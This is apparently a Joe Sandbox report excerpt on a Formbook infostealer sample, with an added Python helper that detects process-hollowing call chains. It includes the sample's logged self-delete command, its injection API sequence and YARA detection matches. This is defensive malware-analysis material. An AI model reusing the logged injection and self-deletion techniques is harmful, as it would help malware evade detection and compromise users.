            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_008663D1
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01471D55
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013A0D20
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013C4120
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013AF900
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01472D07
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014725DD
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D2581
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013BD5E0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B841F
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01461002
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D20A0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013BB090
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014728EC
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014720A8
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01472B28
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013DEBB0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0146DBD2
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01471FF1
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013C6E30
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01472EF7
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014722AE
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047BD466
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0470841F
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047C1D55
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_046F0D20
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047C2D07
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0470D5E0
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047C25DD
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04722581
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04716E30
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047BD616
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047C2EF7
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047C1FF1
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047CDFCE
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047CE824
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047B1002
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047C28EC
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047220A0
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047C20A8
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0470B090
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04714120
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_046FF900
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047AFA2B
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047C22AE
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047C2B28
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047B03DA
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047BDBD2
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0472EBB0
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255B8B1
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255B954
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255CE85
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255BF12
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255C795
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_02542FB0
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_02548C50
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_02548C4B
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255B496
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255B493
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255C539
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_02542D90
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_02542D89

            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 046FB150 appears 45 times
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: String function: 013AB150 appears 35 times

            Source: UOMp9cDcqZ.exe | Binary or memory string: OriginalFilename vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe, 00000001.00000002.256636609.0000000008D10000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe, 00000001.00000002.256510842.0000000008A20000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe | Binary or memory string: OriginalFilename vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe, 00000002.00000002.315793832.0000000001353000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe, 00000002.00000002.316166419.000000000162F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe | Binary or memory string: OriginalFilenameOrderablePartitioner.exeZ vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

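The native-API rows above list, for both UOMp9cDcqZ.exe (PID 2) and colorcpl.exe (PID 15), the calls that make up a process-hollowing chain (NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory or NtMapViewOfSection, NtSetContextThread or NtQueueApcThread, NtResumeThread), and the OriginalFilename rows show version-resource names (colorcpl.exe, ntdll.dll) that do not match the sample's own file name. Reading that out of a hundred rows by hand is error-prone, so the Python helper below groups the rows per process and reports which stages of the chain each process exhibits. It is an added example, not part of the Joe Sandbox report or its tooling; it parses rows in the report's own column-fused layout, the stage-to-API mapping in HOLLOWING_STAGES is a heuristic chosen for this example rather than a Joe Sandbox signature, and the embedded sample rows are a constructed subset copied from this report.

```python
"""Per-process triage of Joe Sandbox 'Code function' and 'OriginalFilename' rows.

Added example for this report, not part of Joe Sandbox. HOLLOWING_STAGES is a
heuristic chosen for the example, not a Joe Sandbox signature definition.
"""
import re
from collections import defaultdict

# Constructed sample input: a subset of rows copied from the report in its own
# (column-fused) layout. Row types the parsers do not recognise are ignored.
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013EAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047399D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047397A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047398A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0473AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739A20 NtResumeThread,
Source: UOMp9cDcqZ.exe, 00000002.00000002.315793832.0000000001353000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe, 00000002.00000002.316166419.000000000162F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exeBinary or memory string: OriginalFilename vs UOMp9cDcqZ.exe
"""

# 'Source: <image>Code function: <pid>_<round>_<addr> <Api>,<Api>,'
CODE_ROW = re.compile(
    r"^Source: (?P<image>.+?)Code function: (?P<pid>\d+)_\d+_[0-9A-Fa-f]+ (?P<apis>(?:\w+,)+)$"
)
# 'OriginalFilename<name>.<ext><stray bytes> vs <sample>'; the report fuses a
# few stray bytes after the extension (the 'j%' above), so cut at .exe/.dll.
ORIGNAME_ROW = re.compile(
    r"OriginalFilename(?P<name>[\w.\-]+?\.(?:exe|dll))\S* vs (?P<sample>\S+)", re.IGNORECASE
)

# Heuristic stage mapping (assumption): one call from each set is enough to
# count the stage as present. Insertion order is the chain order.
HOLLOWING_STAGES = {
    "spawn": {"NtCreateProcessEx"},
    "hollow": {"NtUnmapViewOfSection"},
    "write": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "redirect": {"NtSetContextThread", "NtQueueApcThread"},
    "resume": {"NtResumeThread"},
}


def parse_code_functions(text):
    """Group the native calls named in 'Code function' rows by PID."""
    per_proc = defaultdict(lambda: {"image": None, "apis": set()})
    for line in text.splitlines():
        m = CODE_ROW.match(line.strip())
        if not m:
            continue
        entry = per_proc[int(m["pid"])]
        entry["image"] = m["image"]
        entry["apis"].update(a for a in m["apis"].split(",") if a)
    return dict(per_proc)


def hollowing_stages(apis):
    """Stages of the hollowing chain, in chain order, that the call set covers."""
    return [stage for stage, names in HOLLOWING_STAGES.items() if apis & names]


def assess(text):
    """Per PID: image path, stages seen, and whether every stage is present."""
    report = {}
    for pid, entry in parse_code_functions(text).items():
        stages = hollowing_stages(entry["apis"])
        report[pid] = {
            "image": entry["image"],
            "stages": stages,
            "complete_chain": len(stages) == len(HOLLOWING_STAGES),
        }
    return report


def original_filename_mismatches(text):
    """Version-resource OriginalFilename values that differ from the sample name."""
    found = []
    for line in text.splitlines():
        m = ORIGNAME_ROW.search(line)
        if m and m["name"].lower() != m["sample"].lower():
            found.append(m["name"])
    return found


if __name__ == "__main__":
    for pid, info in sorted(assess(SAMPLE_ROWS).items()):
        verdict = "FULL HOLLOWING CHAIN" if info["complete_chain"] else "partial"
        print(f"pid {pid} ({info['image']}): {', '.join(info['stages']) or '-'} -> {verdict}")
    print("OriginalFilename values differing from the sample name:",
          original_filename_mismatches(SAMPLE_ROWS))
```

On the rows of this report both PID 2 and PID 15 cover all five stages, which is consistent with the "Sample uses process hollowing technique" and "Queues an APC in another process" verdicts, and the mismatching OriginalFilename values (colorcpl.exe, ntdll.dll) are the images found inside the sample's own memory, which is what a mapped-in hollowing target looks like. The parser is deliberately strict about the row shape: a "Code function" row without a trailing API list (the bare-address rows above) is skipped rather than guessed at.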
            Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: UOMp9cDcqZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@10/6
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UOMp9cDcqZ.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
            Source: UOMp9cDcqZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
            Source: UOMp9cDcqZ.exeVirustotal: Detection: 16%
            Source: UOMp9cDcqZ.exeMetadefender: Detection: 22%
            Source: UOMp9cDcqZ.exeReversingLabs: Detection: 50%
            Source: unknownProcess created: C:\Users\user\Desktop\UOMp9cDcqZ.exe 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: UOMp9cDcqZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: UOMp9cDcqZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: UOMp9cDcqZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: UOMp9cDcqZ.exe
            Source: Binary string: colorcpl.pdbGCTL source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
            Source: Binary string: colorcpl.pdb source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: UOMp9cDcqZ.exe, 00000002.00000003.245683230.0000000001050000.00000004.00000001.sdmp, colorcpl.exe, 0000000F.00000002.494600161.00000000046D0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: UOMp9cDcqZ.exe, colorcpl.exe

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: UOMp9cDcqZ.exe, Aspiring_Rookie/DebuggableAttribute.cs | .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.UOMp9cDcqZ.exe.6e0000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs | .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.UOMp9cDcqZ.exe.6e0000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs | .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.UOMp9cDcqZ.exe.860000.2.unpack, Aspiring_Rookie/DebuggableAttribute.cs | .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.UOMp9cDcqZ.exe.860000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs | .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.UOMp9cDcqZ.exe.860000.1.unpack, Aspiring_Rookie/DebuggableAttribute.cs | .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E613656 push cs; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E6112B0 push cs; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E6112BA push cs; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041B2A2 push cs; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041B3F2 push eax; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041B3FB push eax; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041B3A5 push eax; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041B45C push eax; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00415414 push esp; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00414F46 push cs; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041BF12 push dword ptr [8427D5C5h]; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00415FC5 push ebp; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013FD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0474D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255B2A2 push cs; ret
